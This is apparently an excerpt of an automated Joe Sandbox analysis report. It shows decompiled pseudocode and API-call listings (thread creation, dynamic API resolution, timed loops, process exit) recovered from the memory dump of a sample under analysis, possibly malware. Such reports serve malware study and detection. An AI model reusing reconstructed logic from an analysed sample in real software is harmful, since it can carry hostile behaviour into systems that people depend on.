    													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x4c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x4c)) + 1;
    													goto L48;
    												}
    												_t313 =  *((intOrPtr*)(_t333 + 4));
    												_t276 =  *((intOrPtr*)(_t313 + _t332 * 4));
    												__eflags = _t217 -  *((intOrPtr*)(_t276 + 0x4c));
    												if(_t217 >=  *((intOrPtr*)(_t276 + 0x4c))) {
    													goto L62;
    												}
    												__imp___time64(0);
    												_v32 = _t313;
    												_t278 =  *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x48);
    												_t334 = _t334 + 4;
    												_t316 = _v8 + _v8;
    												__eflags = _t316;
    												 *(_t278 + 8 + _t316 * 8) = _t217;
    												 *((intOrPtr*)(_t278 + 0xc + _t316 * 8)) = _v32;
    												goto L46;
    											}
    											__imp___time64(0);
    											_v40 = _t306;
    											_t334 = _t336 + 4;
    											_t229 = _t212 -  *((intOrPtr*)( *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x48) + 8 + (_v8 + _v8) * 8));
    											__eflags = _t229;
    											_v60 = _t229;
    											asm("sbb eax, [edx+ecx*8+0xc]");
    											_t282 = _v60;
    											_v20 = _v40;
    											if(__eflags < 0) {
    												goto L48;
    											}
    											if(__eflags > 0) {
    												goto L42;
    											}
    											__eflags = _t282 - 0x708;
    											if(_t282 < 0x708) {
    												goto L48;
    											}
    											goto L42;
    										}
    										_v12 = 0;
    										while(1) {
    											_t320 =  *0x3b8628; // 0x593938
    											_t233 =  *((intOrPtr*)( *((intOrPtr*)(_t320 + 0xe0))))( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x48)) + _v12)),  *(_t252 + 4));
    											__eflags = _t233;
    											if(_t233 == 0) {
    												goto L38;
    											}
    											_t211 =  *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4));
    											_v12 = _v12 + 0x10;
    											_t286 = _v8 + 1;
    											_v8 = _t286;
    											__eflags = _t286 -  *(_t211 + 0x4c);
    											if(_t286 <  *(_t211 + 0x4c)) {
    												continue;
    											}
    											goto L38;
    										}
    										goto L38;
    									}
    									_v260 = 0x44;
    									_t235 =  *0x3b8628; // 0x593938
    									_t236 =  *((intOrPtr*)( *((intOrPtr*)(_t235 + 0xe0))))( *(_t252 + 4),  &_v260);
    									__eflags = _t236;
    									if(_t236 != 0) {
    										goto L42;
    									}
    									goto L34;
    								}
    								_t289 =  *(_t252 + 8);
    								__eflags = _t289;
    								if(_t289 == 0) {
    									goto L48;
    								}
    								__eflags =  *_t289 - _t207;
    								if( *_t289 == _t207) {
    									goto L48;
    								}
    								while(1) {
    									__eflags = _t207 - 0x200;
    									if(_t207 >= 0x200) {
    										break;
    									}
    									_t207 = _t207 + 1;
    									__eflags =  *((char*)(_t289 + _t207));
    									if( *((char*)(_t289 + _t207)) != 0) {
    										continue;
    									}
    									break;
    								}
    								_t36 = _t207 - 1; // 0x0
    								__eflags = _t36 - 0x1fe;
    								if(_t36 > 0x1fe) {
    									goto L48;
    								}
    								_v20 = E0039B230(_t289, _t207);
    								_t239 =  *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4));
    								_t324 =  *(_t239 + 0x54);
    								_t334 = _t334 + 8;
    								_t290 = 0;
    								_v12 = _t324;
    								__eflags = _t324;
    								if(_t324 <= 0) {
    									L29:
    									__eflags = _t290 - _t324;
    									if(_t290 != _t324) {
    										goto L48;
    									}
    									_t242 = E003A1D90( *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x54) + 1 << 4,  *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x50));
    									_t336 = _t334 + 8;
    									__eflags = _t242;
    									if(_t242 != 0) {
    										 *((intOrPtr*)(_t242 +  *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x54) * 4)) = _v20;
    										 *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x50) = _t242;
    										 *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x54) =  *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x54) + 1;
    									}
    									goto L42;
    								}
    								_t245 =  *((intOrPtr*)(_t239 + 0x50));
    								while(1) {
    									__eflags =  *_t245 - _v20;
    									_t324 = _v12;
    									if( *_t245 == _v20) {
    										goto L29;
    									}
    									_t290 = _t290 + 1;
    									_t245 = _t245 + 4;
    									__eflags = _t290 - _t324;
    									if(_t290 < _t324) {
    										continue;
    									}
    									goto L29;
    								}
    								goto L29;
    							}
    							E003A19B0(_t333, _t252);
    						}
    						L48:
    						_t332 = _t332 + 1;
    					} while (_t332 <  *_t333);
    					if(_t252 != 0) {
    						_t189 =  *_t252;
    						if( *_t252 != 0) {
    							E0039BB40(_t189);
    							_t334 = _t334 + 4;
    						}
    						_t190 =  *(_t252 + 4);
    						if( *(_t252 + 4) != 0) {
    							E0039BB40(_t190);
    							_t334 = _t334 + 4;
    						}
    						_t191 =  *(_t252 + 8);
    						if( *(_t252 + 8) != 0) {
    							E0039BB40(_t191);
    							_t334 = _t334 + 4;
    						}
    						_t192 =  *(_t252 + 0x10);
    						if( *(_t252 + 0x10) != 0) {
    							E0039BB40(_t192);
    							_t334 = _t334 + 4;
    						}
    						_t193 =  *(_t252 + 0xc);
    						if( *(_t252 + 0xc) != 0) {
    							E0039BB40(_t193);
    							_t334 = _t334 + 4;
    						}
    						E0039BB40(_t252);
    					}
    					goto L61;
    				}
    			}

    APIs
      • Part of subcall function 00394F50: memcpy.MSVCRT ref: 00394FC8
      • Part of subcall function 00394F50: memcpy.MSVCRT ref: 00394FE5
    • _time64.MSVCRT ref: 0039A85C
    • CreateThread.KERNEL32(00000000,00000000,Function_000044B0,00000000,00000000,?), ref: 0039A8CA
    • _time64.MSVCRT ref: 0039A8EE
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • _time64.MSVCRT ref: 0039A9CE
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 52%
    			E0039FD69() {
    				void* _t181;
    				void* _t188;
    				signed int* _t198;
    				int _t207;
    				int _t212;
    				int _t214;
    				int _t218;
    				int _t219;
    				int _t221;
    				int _t224;
    				void* _t226;
    				int _t230;
    				int _t231;
    				int _t233;
    				int _t235;
    				int _t236;
    				int _t237;
    				int _t238;
    				int _t242;
    				int _t243;
    				int _t247;
    				int _t249;
    				int _t255;
    				int _t261;
    				int _t263;
    				int _t264;
    				int _t266;
    				int _t276;
    				int _t281;
    				intOrPtr _t282;
    				int _t283;
    				signed int* _t290;
    				int _t293;
    				signed int _t313;
    				signed int _t316;
    				signed int _t332;
    				int _t337;
    				int _t352;
    				signed int _t354;
    				int _t361;
    				int _t363;
    				int _t364;
    				int _t365;
    				signed short* _t366;
    				int _t371;
    				signed int _t372;
    				int _t377;
    				int _t383;
    				signed int _t385;
    				signed int _t392;
    				int _t394;
    				int _t395;
    				void* _t396;
    				void* _t398;
    				int _t399;
    				void* _t400;
    				void* _t401;
    				void* _t402;
    				void* _t403;
    				void* _t405;
    				void* _t408;
    				void* _t409;
    				void* _t410;
    				void* _t412;
    				void* _t415;
    
    				E00392420(_t397);
    				L00391CB0();
    				_t402 = _t401 + 4;
    				_t293 =  *0x3b8628; // 0x593938
    				 *0x3b8570 = _t289;
    				 *0x3b8584 = _t289;
    				 *0x3b8574 = _t289;
    				 *0x3b8578 = _t289;
    				 *((intOrPtr*)( *((intOrPtr*)(_t293 + 0xcc))))(0x3b8594, 0x800, _t397);
    				E00391B20(_t400 - 0x5c0,  *((intOrPtr*)(_t293 + 0xcc)), _t412);
    				_t181 = E0039BB30(_t400 - 0xc);
    				_push(0x34);
    				 *(_t400 - 0x58) = _t289;
    				 *(_t400 - 0x28) = _t289;
    				L0039A47E();
    				_t403 = _t402 + 4;
    				_t413 = _t181 - _t289;
    				if(_t181 == _t289) {
    					 *(_t400 - 0x5b8) = _t289;
    				} else {
    					 *(_t400 - 0x5b8) = E003970B0(_t181);
    				}
    				E00399090(_t413, _t400 - 0x9c0, 3);
    				E0039F550(_t400 - 0x50, _t289, _t400 - 0x9c0, 0xa, _t400 - 0x54, _t400 - 0x50);
    				E00391F00(_t400 - 0xc,  *((intOrPtr*)(_t400 - 0x54)),  *((intOrPtr*)(_t400 - 0x50))); // executed
    				_t188 = E003969F0(_t400 - 0x5b8, _t400 - 0xc, _t400 - 0x5b8); // executed
    				_t405 = _t403 + 0x24;
    				if(_t188 != 0) {
    					 *(_t400 - 0x5c0) = _t400 - 0xc;
    					__eflags = E003A0AD0(_t400 - 0x5c0,  *((intOrPtr*)( *(_t400 - 0x5b8) + 0x14)));
    					if(__eflags == 0) {
    						goto L5;
    					} else {
    						E00395700( *((intOrPtr*)(_t400 - 0x5bc)), __eflags);
    						 *0x3b85ac = _t289;
    						 *(_t400 - 0x30) = _t289;
    						 *(_t400 - 0x2c) = _t289;
    						 *(_t400 - 0x14) = _t289;
    						 *(_t400 - 0x10) = _t289;
    						 *(_t400 - 0x3c) = _t289;
    						 *(_t400 - 0x38) = _t289;
    						 *(_t400 - 0x44) = _t289;
    						 *(_t400 - 0x40) = _t289;
    						 *((intOrPtr*)( *( *0x3b8628)))(_t289, _t289, E003B08A0, _t400 - 0x5c0, _t289, _t400 - 0x74);
    						 *(_t400 - 0x24) = _t289;
    						while(1) {
    							_t212 =  *(_t400 - 0x5b8);
    							_t316 = 0;
    							 *0x3b857c = 0;
    							 *(_t400 - 0x20) = _t289;
    							__eflags =  *((intOrPtr*)(_t212 + 0x18)) - _t289;
    							if(__eflags <= 0) {
    								goto L72;
    							}
    							do {
    								_t371 =  *( *((intOrPtr*)(_t212 + 0x20)) + _t316 * 4);
    								_t218 = L003994D0(_t400 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x1c)) + _t316 * 4)), _t371); // executed
    								__eflags = _t218;
    								if(_t218 != 0) {
    									__imp___time64(_t289);
    									_t395 = _t371;
    									_t372 =  *0x3b857c; // 0x1
    									_t408 = _t405 + 4;
    									_t397 = _t218;
    									_t219 = _t218 -  *((intOrPtr*)( *((intOrPtr*)( *(_t400 - 0x5b8) + 0x24)) + _t372 * 8));
    									__eflags = _t219;
    									asm("sbb ebx, [ecx+edx*8+0x4]");
    									 *(_t400 - 0x48) = _t395;
    									if(__eflags < 0) {
    										L20:
    										_t289 = 0; // executed
    										_t221 = E003A1B80(_t397, _t400 - 0xc, _t400 - 0x5c0, _t400 - 0x28); // executed
    										_t405 = _t408 + 0xc;
    										__eflags = _t221;
    										if(_t221 == 0) {
    											 *(_t400 - 0x20) =  *(_t400 - 0x20) + 1;
    											 *( *((intOrPtr*)(_t400 - 0x5bc)) + 0xc) =  *(_t400 - 0x28);
    											_t224 = _t397 -  *(_t400 - 0x3c);
    											__eflags = _t224;
    											asm("sbb edx, [ebp-0x38]");
    											 *(_t400 - 0x48) = _t395;
    											if(__eflags < 0) {
    												L29:
    												E003942A0(__eflags, _t400 - 0x5c0); // executed
    												_t409 = _t405 + 4;
    												_t226 = E003A12C0(); // executed
    												_push(4);
    												__eflags = _t226 - _t289;
    												if(__eflags >= 0) {
    													if(__eflags != 0) {
    														_push(_t400 - 0x9c0);
    														E00399090(__eflags);
    														E00399090(__eflags, _t400 - 0xdc0, 7);
    														_push(_t400 - 0xdc0);
    														_push(_t400 - 0x9c0);
    														_push(0xe);
    														_t377 = _t400 - 0x5c0;
    														_push(_t377); // executed
    													} else {
    														_push(_t400 - 0x9c0);
    														E00399090(__eflags);
    														E00399090(__eflags, _t400 - 0xdc0, 6);
    														_push(_t400 - 0xdc0);
    														_t377 = _t400 - 0x9c0;
    														_push(_t377);
    														_push(0xe);
    														_push(_t400 - 0x5c0);
    													}
    												} else {
    													_push(_t400 - 0x9c0);
    													E00399090(__eflags);
    													E00399090(__eflags, _t400 - 0xdc0, 5);
    													_t377 = _t400 - 0xdc0;
    													_push(_t377);
    													_push(_t400 - 0x9c0);
    													_push(0xe);
    													_push(_t400 - 0x5c0);
    												}
    												_t230 = E00395A10(); // executed
    												_t410 = _t409 + 0x20;
    												 *(_t400 - 0x48) = _t289;
    												do {
    													__imp___time64(0);
    													_t397 = _t230;
    													_t231 =  *0x3b8570; // 0x0
    													_t405 = _t410 + 4;
    													_t395 = _t377;
    													__eflags = _t231 - 2;
    													if(_t231 == 2) {
    														L39:
    														_t233 = E003936E0(_t395, _t397, _t400 - 0xc, _t400 - 0x5c0,  *(_t400 - 0x14),  *(_t400 - 0x10)); // executed
    														_t405 = _t405 + 0x10;
    														asm("sbb edx, 0x0");
    														 *(_t400 - 0x14) = _t397 - 0x708;
    														 *(_t400 - 0x10) = _t395;
    														__eflags = _t233 - 1;
    														if(_t233 == 1) {
    															 *0x3b85ac = _t233;
    														}
    														L41:
    														_t235 = _t397 -  *(_t400 - 0x44);
    														__eflags = _t235;
    														asm("sbb ecx, [ebp-0x40]");
    														 *(_t400 - 0x5c) = _t395;
    														if(__eflags < 0) {
    															L48:
    															_t397 = _t397 -  *(_t400 - 0x30);
    															__eflags = _t397;
    															asm("sbb edi, [ebp-0x2c]");
    															 *(_t400 - 0x5c) = _t395;
    															if(__eflags < 0) {
    																L55:
    																_t236 = E00399890( *((intOrPtr*)(_t400 - 0x5bc)));
    																__eflags = _t236;
    																if(_t236 == 0) {
    																	L70:
    																	_t289 = 0;
    																	__eflags = 0;
    																	goto L71;
    																}
    																_push(1);
    																_push(_t400 - 0x5c0);
    																_t237 = E00395A10();
    																_t405 = _t405 + 8;
    																__eflags = _t237;
    																if(__eflags == 0) {
    																	goto L70;
    																}
    																_t377 = _t400 - 0x5c0;
    																_t238 = E00397560(_t289, __eflags, _t377);
    																_t405 = _t405 + 4;
    																__eflags = _t238;
    																if(_t238 == 0) {
    																	__eflags =  *0x3b85ac;
    																	if( *0x3b85ac != 0) {
    																		L75:
    																		E00391700(_t400 - 0xc);
    																		E0039F850(_t289, _t400 - 0x5c0);
    																		E0039C930(_t400 - 4);
    																		_t289 = 0;
    																		__eflags = 0;
    																		L76:
    																		_t415 =  *0x3b85ac - _t289; // 0x0
    																		if(_t415 == 0) {
    																			L89:
    																			E00399480();
    																			E00397E10();
    																			ExitProcess(_t289);
    																		}
    																		_t361 =  *0x3b8628; // 0x593938
    																		_t398 = 0;
    																		 *((intOrPtr*)(_t400 - 0x70)) = 0;
    																		 *((intOrPtr*)(_t400 - 0x6c)) = 0;
    																		 *((intOrPtr*)(_t400 - 0x68)) = 0;
    																		 *((intOrPtr*)(_t400 - 0x64)) = 0;
    																		 *(_t400 - 0x18) = 0;
    																		 *((intOrPtr*)(_t400 - 0xb8)) = 0x44;
    																		 *((intOrPtr*)( *((intOrPtr*)(_t361 + 0xb8))))(_t400 - 0xb8);
    																		E00398030(_t400 - 0x18);
    																		_t198 = E003A1D90(0x20a, 0);
    																		_t290 = _t198;
    																		if(_t290 == 0) {
    																			L88:
    																			_t363 =  *0x3b8628; // 0x593938
    																			 *((intOrPtr*)( *((intOrPtr*)(_t363 + 0xd8))))( *(_t400 - 0x18), _t398, _t398, _t398, _t398, _t398, _t398, _t290, _t400 - 0xb8, _t400 - 0x70);
    																			_t364 =  *0x3b8628; // 0x593938
    																			 *((intOrPtr*)( *((intOrPtr*)(_t364 + 0xf8))))( *((intOrPtr*)(_t400 - 0x70)));
    																			_t365 =  *0x3b8628; // 0x593938
    																			 *((intOrPtr*)( *((intOrPtr*)(_t365 + 0xf8))))( *((intOrPtr*)(_t400 - 0x6c)));
    																			E0039BB40( *(_t400 - 0x18));
    																			_t289 = 0;
    																			goto L89;
    																		}
    																		_t366 =  *(_t400 - 0x18);
    																		_t399 = 0x104;
    																		_t396 = 0;
    																		while(1) {
    																			_t167 = _t399 + 0x7ffffefa; // 0x7ffffffe
    																			if(_t167 == 0) {
    																				break;
    																			}
    																			_t313 =  *_t366 & 0x0000ffff;
    																			if(_t313 == 0) {
    																				break;
    																			}
    																			 *_t198 = _t313;
    																			_t198 =  &(_t198[0]);
    																			_t366 =  &(_t366[1]);
    																			_t399 = _t399 - 1;
    																			if(_t399 != 0) {
    																				continue;
    																			}
    																			L84:
    																			_t198 = _t198 - 2;
    																			_t396 = 0x8007007a;
    																			L85:
    																			 *_t198 = 0;
    																			if(_t396 >= 0) {
    																				_t207 =  *0x3b8628; // 0x593938
    																				 *((intOrPtr*)( *((intOrPtr*)(_t207 + 0x1e8))))(_t290);
    																			}
    																			_t398 = 0;
    																			goto L88;
    																		}
    																		__eflags = _t399;
    																		if(_t399 != 0) {
    																			goto L85;
    																		}
    																		goto L84;
    																	}
    																	goto L70;
    																}
    																__eflags =  *0x3b85ac;
    																if( *0x3b85ac != 0) {
    																	goto L75;
    																}
    																_t242 =  *0x3b8584; // 0x1
    																_t397 = 0xa;
    																__eflags = _t242;
    																if(_t242 == 0) {
    																	_t243 =  *(_t400 - 0x24);
    																	__eflags = _t243;
    																	if(_t243 <= 0) {
    																		while(1) {
    																			L63:
    																			_t337 =  *0x3b8584; // 0x1
    																			__eflags = _t337;
    																			if(_t337 != 0) {
    																				goto L65;
    																			}
    																			_t377 =  *0x3b8628; // 0x593938
    																			 *((intOrPtr*)( *((intOrPtr*)(_t377 + 0xc8))))(0x4e20);
    																			_t397 = _t397 - 1;
    																			__eflags = _t397;
    																			if(_t397 > 0) {
    																				continue;
    																			}
    																			goto L65;
    																		}
    																		goto L65;
    																	}
    																	L62:
    																	_t247 = _t243 - 1;
    																	__eflags = _t247;
    																	 *(_t400 - 0x24) = _t247;
    																	_t397 = 1;
    																	goto L63;
    																}
    																_t138 = _t397 - 5; // 0x5
    																_t243 = _t138;
    																 *0x3b8584 = 0;
    																goto L62;
    															}
    															if(__eflags > 0) {
    																L51:
    																_t397 = E0039F2D0(_t400 - 0x5c0);
    																_t249 = E003999A0(_t289, _t400 - 0x19, _t395, _t248, _t248);
    																_push(8);
    																__eflags = _t249;
    																if(__eflags == 0) {
    																	_push(_t400 - 0x9c0);
    																	E00399090(__eflags);
    																	E00399090(__eflags, _t400 - 0xdc0, 0xa);
    																	_push(_t400 - 0xdc0);
    																	_t383 = _t400 - 0x9c0;
    																	_push(_t383);
    																	_push(0xe);
    																	_push(_t400 - 0x5c0);
    																} else {
    																	_push(_t400 - 0x9c0);
    																	E00399090(__eflags);
    																	E00399090(__eflags, _t400 - 0xdc0, 9);
    																	_t383 = _t400 - 0xdc0;
    																	_push(_t383);
    																	_push(_t400 - 0x9c0);
    																	_push(0xe);
    																	_push(_t400 - 0x5c0);
    																}
    																E00395A10();
    																_t255 = E0039BB40(_t397);
    																__imp___time64(0);
    																_t405 = _t405 + 0x28;
    																 *(_t400 - 0x30) = _t255;
    																 *(_t400 - 0x2c) = _t383;
    																goto L55;
    															}
    															__eflags = _t397 - 0x7080;
    															if(_t397 <= 0x7080) {
    																goto L55;
    															}
    															goto L51;
    														}
    														if(__eflags > 0) {
    															L44:
    															_t385 =  *0x3b857c; // 0x1
    															_t261 = _t397 -  *((intOrPtr*)( *((intOrPtr*)( *(_t400 - 0x5b8) + 0x28)) + _t385 * 8));
    															__eflags = _t261;
    															_t289 = _t395;
    															asm("sbb ebx, [ecx+edx*8+0x4]");
    															 *(_t400 - 0x5c) = _t395;
    															if(__eflags < 0) {
    																goto L48;
    															}
    															if(__eflags > 0) {
    																L47:
    																 *(_t400 - 0x44) = _t397;
    																 *(_t400 - 0x40) = _t395;
    																_t263 = E00391FE0(_t289, _t395, _t397, _t400 - 0xc, _t400 - 0x5c0, _t400 - 0x5b8); // executed
    																_t405 = _t405 + 0xc;
    																__eflags = _t263;
    																if(_t263 != 0) {
    																	_t264 = E003A0AD0(_t400 - 0x5c0,  *((intOrPtr*)( *(_t400 - 0x5b8) + 0x14)));
    																	__eflags = _t264;
    																	if(_t264 == 0) {
    																		goto L75;
    																	}
    																	 *0x3b857c = 0;
    																	goto L70;
    																}
    																goto L48;
    															}
    															__eflags = _t261 - 0x3840;
    															if(_t261 <= 0x3840) {
    																goto L48;
    															}
    															goto L47;
    														}
    														__eflags = _t235 - 0x4b0;
    														if(_t235 <= 0x4b0) {
    															goto L48;
    														}
    														goto L44;
    													}
    													_t266 = _t397 -  *(_t400 - 0x14);
    													__eflags = _t266;
    													asm("sbb ecx, [ebp-0x10]");
    													 *(_t400 - 0x5c) = _t395;
    													if(__eflags < 0) {
    														goto L41;
    													}
    													if(__eflags > 0) {
    														goto L39;
    													}
    													__eflags = _t266 - 0xe10;
    													if(_t266 <= 0xe10) {
    														goto L41;
    													}
    													goto L39;
    													L65:
    													_t230 =  *(_t400 - 0x48) + 1;
    													 *(_t400 - 0x48) = _t230;
    													__eflags = _t230 - 0x64;
    												} while (_t230 < 0x64);
    												goto L70;
    											}
    											if(__eflags > 0) {
    												L27:
    												_t276 = E0039AC90( *(_t400 - 0x5b8), _t400 - 0x5c0); // executed
    												_t405 = _t405 + 8;
    												__eflags = _t276;
    												if(__eflags == 0) {
    													goto L71;
    												}
    												 *(_t400 - 0x3c) = _t397;
    												 *(_t400 - 0x38) = _t395;
    												goto L29;
    											}
    											__eflags = _t224 - 0xe10;
    											if(__eflags <= 0) {
    												goto L29;
    											}
    											goto L27;
    										}
    										__eflags = _t221 - 1;
    										if(_t221 != 1) {
    											E0039C870(_t400 - 0x5c0, _t221);
    											_t405 = _t405 + 8;
    										}
    										_t352 =  *0x3b8628; // 0x593938
    										 *((intOrPtr*)( *((intOrPtr*)(_t352 + 0xc8))))(0x3e8);
    										goto L71;
    									}
    									if(__eflags > 0) {
    										L15:
    										_t281 = E0039D890(_t397, __eflags, _t400 - 0xc, _t400 - 0x5c0, _t400 - 0x58); // executed
    										_t408 = _t408 + 0xc;
    										__eflags = _t281;
    										if(_t281 == 0) {
    											_t282 =  *((intOrPtr*)( *(_t400 - 0x5b8) + 0x24));
    											_t354 =  *0x3b857c; // 0x1
    											 *(_t282 + _t354 * 8) = _t397;
    											_t392 =  *0x3b857c; // 0x1
    											 *(_t282 + 4 + _t392 * 8) = _t395;
    											goto L20;
    										}
    										__eflags = _t281 - 1;
    										if(_t281 != 1) {
    											E0039C870(_t400 - 0x5c0, _t281);
    											_t405 = _t408 + 8;
    										}
    										_t283 =  *0x3b8628; // 0x593938
    										 *((intOrPtr*)( *((intOrPtr*)(_t283 + 0xc8))))(0x3e8);
    										goto L70;
    									}
    									__eflags = _t219 - 0x3840;
    									if(__eflags <= 0) {
    										goto L20;
    									}
    									goto L15;
    								}
    								_t394 =  *0x3b8628; // 0x593938
    								 *((intOrPtr*)( *((intOrPtr*)(_t394 + 0xc8))))(0x3e8);
    								L71:
    								_t332 =  *0x3b857c; // 0x1
    								_t212 =  *(_t400 - 0x5b8);
    								_t316 = _t332 + 1;
    								 *0x3b857c = _t316;
    								__eflags = _t316 -  *((intOrPtr*)(_t212 + 0x18));
    							} while (__eflags < 0);
    							L72:
    							_t214 = E003B0A40(_t395, _t397, __eflags, _t400 - 0xc, _t400 - 0x5b8);
    							_t405 = _t405 + 8;
    							__eflags = _t214;
    							if(_t214 == 0) {
    								__eflags =  *(_t400 - 0x20) - _t289;
    								if(__eflags == 0) {
    									L003B0D30(_t289, _t395, _t397, __eflags, _t400 - 0xc, _t400 - 0x5c0);
    									_t405 = _t405 + 8;
    								}
    							}
    						}
    					}
    				}
    				L5:
    				E00391700(_t400 - 0xc);
    				E0039F850(_t289, _t400 - 0x5c0);
    				E0039C930(_t400 - 4);
    				goto L76;
    			}

    APIs
    • ??3@YAXPAX@Z.MSVCRT ref: 0039FD71
      • Part of subcall function 00391B20: memset.MSVCRT ref: 00391B53
      • Part of subcall function 00391B20: memset.MSVCRT ref: 00391B62
      • Part of subcall function 00391B20: ??2@YAPAXI@Z.MSVCRT ref: 00391B79
      • Part of subcall function 00391B20: ??2@YAPAXI@Z.MSVCRT ref: 00391B98
    • ??2@YAPAXI@Z.MSVCRT ref: 0039FDC4
      • Part of subcall function 00391F00: memcpy.MSVCRT ref: 00391F9C
      • Part of subcall function 003969F0: ??2@YAPAXI@Z.MSVCRT ref: 00396A09
      • Part of subcall function 003969F0: ??2@YAPAXI@Z.MSVCRT ref: 00396A24
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396ADA
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396B34
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396B88
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396C0A
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396C1E
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F90D
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F924
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F955
    • ExitProcess.KERNEL32 ref: 003A04F6
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 78%
    			E00391FE0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
    				char _v8;
    				char _v12;
    				signed int _v16;
    				char _v20;
    				void* _t34;
    				void* _t39;
    				intOrPtr _t41;
    				intOrPtr _t47;
    				intOrPtr _t49;
    				intOrPtr _t50;
    				intOrPtr _t53;
    				intOrPtr* _t55;
    				intOrPtr _t61;
    				intOrPtr _t65;
    				intOrPtr* _t70;
    				intOrPtr* _t72;
    				signed int _t75;
    				signed int _t77;
    				void* _t78;
    				void* _t79;
    
    				_t72 = _a12;
    				_t53 =  *_t72;
    				_t75 = 0;
    				_v8 = 0;
    				_v12 = 0;
    				_v20 = 0;
    				_v16 = 0;
    				_t34 = E00395A10(_a8, 0x17,  *((intOrPtr*)(_t53 + 0x10)),  &_v8,  &_v12,  &_v20, __edi, __esi); // executed
    				_t79 = _t78 + 0x18;
    				if(_t34 == 0) {
    					L13:
    					_t35 = _v8;
    					if(_v8 != 0) {
    						E0039BB40(_t35);
    					}
    					return _v16;
    				}
    				_push(0x34);
    				L0039A47E();
    				_t79 = _t79 + 4;
    				if(_t34 != 0) {
    					_t75 = E003970B0(_t34);
    				}
    				_t39 = E00399020(_t75, _a4, _v8, _v12); // executed
    				if(_t39 == 0) {
    					L11:
    					__eflags = _t75;
    					if(_t75 != 0) {
    						E0039CB70(_t53, _t75, _t72);
    						_push(_t75);
    						L00391CB0();
    						_t79 = _t79 + 4;
    					}
    				} else {
    					_t41 =  *((intOrPtr*)(_t75 + 0x10));
    					if(_t41 != _v20) {
    						goto L11;
    					}
    					_t86 = _t41 -  *((intOrPtr*)(_t53 + 0x10));
    					if(_t41 <=  *((intOrPtr*)(_t53 + 0x10))) {
    						goto L11;
    					}
    					E003B0900(_t53, _v8, _v12); // executed
